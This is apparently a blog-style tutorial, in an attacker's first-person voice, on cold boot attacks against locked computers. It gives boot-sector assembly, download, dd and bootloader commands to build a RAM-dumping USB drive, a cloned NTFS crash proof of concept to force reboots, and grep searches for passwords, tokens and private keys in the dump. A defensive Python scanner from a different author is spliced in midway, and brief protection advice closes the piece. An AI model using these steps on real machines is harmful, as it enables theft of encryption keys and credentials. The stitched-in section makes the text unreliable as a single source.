It's a familiar situation: you step away from your computer for five minutes and lock the screen because you're a good person and a security nut. The drive is encrypted, the password is strong, all updates are installed. You come back and think your data is completely safe. Spoiler: it's a total disaster.
If I had your computer in my hands for those five minutes, I couldn't care less about your password, BitLocker, or any Microsoft patches. I'd simply extract the keys directly from the RAM, and your encryption would be completely ruined. It's called a cold boot attack, and today I'll tell you how it works in practice.
---
What happens when you lock the screen
You press Win+L, and the system goes into standby mode. The drive appears to be inactive, but the RAM continues to work and store everything that was there. And that's where all the good stuff is:
Disk encryption keys (BitLocker, FileVault, LUKS) – otherwise, how would the system decrypt data on the fly?
Browser passwords – Chrome and Firefox keep them in memory while you're working.
Messenger messages, if you haven't closed the window.
Private SSH and GPG keys, if you used them.
Session cookies – to log in to your website under your name.
And the funniest thing is, to get all this, you don't even need to break your password. Just force the computer to reboot without clearing the memory.
---
Why a simple reboot isn't suitable
If I click "Restart" from the Windows or Linux menu, the system will gently close processes, unload data, and modern operating systems can even forcefully erase the memory upon shutdown. I don't need that.
I need a hard reset—one that simply restarts the processor without the memory controller receiving the "clean everything" command. There are various methods:
Cut the power and quickly turn it back on.
Press the hardware reset button on the case.
Trigger a "blue screen of death" (BSOD) with a specially prepared flash drive—then the system crashes instantly, without having time to clean anything up.
Desktops are easier to handle. Laptops are more complicated—either the battery is non-removable or there's no reset button. But I'll tell you how to deal with them later.
---
Physics of the process: why data doesn't disappear immediately
There's one important thing to understand here. DRAM memory is designed so that after a power outage, data is retained in it not for nanoseconds, but for quite a few seconds. This is called data remanence.
At room temperature, you can unplug the power, and the data will live on the chip for another 5-10 seconds. This is enough to reboot and run the code from the flash drive. If you cool the memory with liquid nitrogen (and such exploits have been used), the data can be stored for minutes.
So when I pull the power, the memory isn't instantly reset. It just freezes, and I have a small window to read it.
---
What I need for the attack
Essentially, just a flash drive with the right software on it. No complex hardware, no programmers. A regular USB drive that can boot.
I use a special image that does two things:
1. Reads physical memory directly, via BIOS interrupts.
2. Dumps the entire RAM contents to a separate partition on the same flash drive.
This leaves the flash drive's file system intact, so I can work with the dump normally later.
Here's what the assembly code snippet that does this looks like (just for clarity, you won't have to write it yourself):
[org 0x7C00]
[bits 16]

resetdisk:
    mov ah, 0x00
    mov dl, 0x00
    int 0x13
    jc resetdisk

getmem:
    mov bx, 0x0000
    mov es, bx
    mov bx, 0x8000

writedisk:
    mov ah, 0x03
    mov al, 0x01
    mov ch, 0x00
    mov cl, 0x03
    mov dh, 0x00
    mov dl, 0x80
    int 0x13

times 510 - ($ - $$) db 0x00
db 0x55, 0xAA
times 8096 db 0xfe
It reads memory at ES:BX and writes to disk using interrupt 13h. If you run it in a loop, it will fetch all the RAM.
---
Preparing the USB drive
You don't have to compile this manually. There's a ready-made set of coldboot-tools. Here's how:
Download the image:
wget https://github.com/baselsayeh/coldboot-tools/releases/download/2/bios_memimage64.zip
Write the bootloader to the USB drive's MBR (let's say it's /dev/sdb):
sudo dd if=grldr.mbr of=/dev/sdb conv=notrunc
Create a partition. Important: not the entire USB drive, but with some extra space. Let's say the USB drive is 16 GB. Make the first partition 8 GB, and leave the rest empty—it will store the RAM dump.
Format the partition in FAT:
sudo mkfs.fat /dev/sdb1
Mount and copy the boot files:
sudo mount /dev/sdb1 /media/usb
cp grldr menu_sec_part.lst scraper*.bin /media/usb/
The bootloader configuration menu_sec_part.lst looks something like this:
title Dump the RAM (64bit Halt)
map (hd0) (hd1)
map (hd0,1)+1 (hd0)
map --hook
rootnoverify (hd0,0)
chainloader --force --boot-cs=0x7c0 --boot-ip=0x200 (hd1,0)/boot/grub4dos/scraper/scraper64_haltonly.bin
After this, the flash drive is ready. It can boot and dump RAM to the second partition.
---
How an attack works in reality
Then it's simple. I go to the computer while you're away. If I need to do it quickly, I just pull the power button. If the computer is in sleep mode, that's even better—the memory is active, and I can immediately insert the flash drive and choose to boot from USB.
On many machines, you can enter the Boot Menu with F8, F12, or Esc. Even if the BIOS has a password, it can often be reset with a jumper on the motherboard or by removing the CMOS battery, which takes a couple of minutes.
As soon as the computer boots from my flash drive, the script starts copying the memory. After a few minutes (depending on the amount of RAM), the dump is ready. I take the flash drive and leave.
You come back, see that the computer has rebooted, think, "Damn, something's wrong," enter the password, and continue working. And I've already left with a complete dump of your RAM.
---
What can I find in the dump?
After I have the flash drive, I convert the raw partition to a file:
sudo dd if=/dev/sdb2 of=ram.img bs=512 status=progress
Sometimes the dump is offset – this is fixed with:
truncate -s $[0x53000] pad.img
cat pad.img ram.img > _ram.img
Now the fun begins. I simply search for strings:
strings ram.img | grep -i password
You can search for specific keywords: cookie, passw, login, token, key, PRIVATE KEY.
But that's just scratching the surface. Truly valuable things are found by signatures:
RSA keys – by PEM/PKCS headers.
Photos – by JFIF/EXIF.
PDF documents — by %PDF.
ZIP/RAR archives — by local headers.
If you dig deeper, the dump contains operating system structures that allow you to reconstruct the sequence of events, processes, and open files. This is already at the level of forensics, but it's still possible.
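As an added example (not from the article and not part of coldboot-tools): a small Python triage scanner that does what the strings/grep and signature steps above describe, so a defender can measure what a captured image would expose, for instance when testing whether a machine's memory still holds secrets after the protections discussed later on this page. The function names and the SAMPLE bytes are my own constructions; the signature patterns are minimal header matches, not full parsers.

```python
import re
from dataclasses import dataclass

# Header signatures for the artefact types the article lists (minimal patterns, assumed here).
SIGNATURES = {
    "pem-private-key": re.compile(rb"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----"),
    "jpeg": re.compile(rb"\xff\xd8\xff[\xe0\xe1]"),  # SOI followed by APP0 (JFIF) or APP1 (EXIF)
    "pdf": re.compile(rb"%PDF-1\.[0-7]"),
    "zip-local-header": re.compile(rb"PK\x03\x04"),   # also docx/jar/apk containers
}

# Keywords from the article, matched case-insensitively like `grep -i`.
KEYWORDS = (b"cookie", b"passw", b"login", b"token", b"private key")

@dataclass
class Hit:
    kind: str       # signature name or "keyword"
    offset: int     # byte offset in the image
    preview: bytes  # first bytes at the hit, for a quick look

def printable_strings(data, min_len=6):
    """Equivalent of `strings`: runs of printable ASCII at least min_len long."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group()) for m in pat.finditer(data)]

def keyword_hits(data, keywords=KEYWORDS, min_len=6):
    """`strings | grep -i`: printable strings containing any watched keyword."""
    hits = []
    for off, s in printable_strings(data, min_len):
        if any(k in s.lower() for k in keywords):
            hits.append(Hit("keyword", off, s[:32]))
    return hits

def signature_hits(data, sigs=SIGNATURES, preview_len=16):
    """Carve by magic bytes: every offset where a known header begins."""
    hits = [Hit(kind, m.start(), bytes(data[m.start():m.start() + preview_len]))
            for kind, pat in sigs.items() for m in pat.finditer(data)]
    return sorted(hits, key=lambda h: h.offset)

def triage(data):
    """Combined report sorted by offset: one pass shows what the image exposes."""
    return sorted(keyword_hits(data) + signature_hits(data), key=lambda h: h.offset)

# Constructed sample "image": zero padding around a few planted artefacts.
SAMPLE = (b"\x00" * 64
          + b"user=alice&password=hunter2\x00"
          + b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
          + b"-----BEGIN RSA PRIVATE KEY-----\nMIIB...\n"
          + b"%PDF-1.7\n"
          + b"PK\x03\x04\x14\x00")

if __name__ == "__main__":
    for h in triage(SAMPLE):
        print(f"{h.offset:#010x} {h.kind:18} {h.preview!r}")
```

For a real multi-gigabyte image, pass an `mmap.mmap` of the file instead of reading it into memory; `re` works directly on it.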
---
What about laptops?
Laptops are more complicated, but not hopeless. Firstly, not all have a hardware reset button. Secondly, the battery is often non-removable. But there are workarounds.
You can trigger a BSOD with a specially prepared flash drive with a corrupted file system. For example, there's a ready-made proof-of-concept (PoC) that creates an image guaranteed to crash Windows upon connection:
git clone https://github.com/mtivadar/windows10_ntfs_crash_dos
dd if=tinyntfs of=/dev/sdb
You insert such a flash drive—the system crashes to a blue screen, and you can reboot with your bootable flash drive.
If the laptop is in hibernation, it's perfect. The memory is active, so I simply insert the flash drive, select boot from USB (if I'm lucky with the Boot Menu), and dump it.
---
How realistic is this in 2025?
Many people think that cold booting is something reserved for intelligence agencies and liquid nitrogen labs. In reality, any schoolchild with a flash drive and access to a computer can do it. The only requirement is the ability to boot from USB.
And that's a problem right now. On many corporate computers, booting from external drives is disabled in the BIOS, and the BIOS itself is password-protected. However:
The BIOS password can often be reset by a jumper on the motherboard or by removing the battery.
On home and many office computers, booting from a flash drive is either enabled or enabled through the Boot Menu without a password.
So there's a chance.
---
How to protect against this
The most reliable way is a complete shutdown. If you're really concerned about your data, don't use sleep or hibernation. Just turn it off—and the memory is empty.
The second option is to use TRESOR or similar kernel patches that store encryption keys in processor registers rather than RAM. But this is an exotic option; it's not found on regular systems.
The third option is to configure the BIOS to disable booting from external drives and set a strong BIOS password. But as I already mentioned, it can be reset.
The fourth option is to use software that forcibly wipes RAM when shutting down. This slows down the shutdown and doesn't always work correctly, but it's better than nothing.
And most importantly, physical access. If someone can get to your computer, consider all your defenses ineffective. This is a fundamental security principle.
A cold boot attack isn't some 2010s hype, but a completely viable method that allows you to bypass disk encryption and extract keys, passwords, and any data from RAM. All an attacker needs is a few minutes of physical access and a bootable USB drive.
So the next time you step away from your computer for a moment, consider: is your data really safe? Because a lock screen password is the last line of defense, and it doesn't solve anything against a cold boot.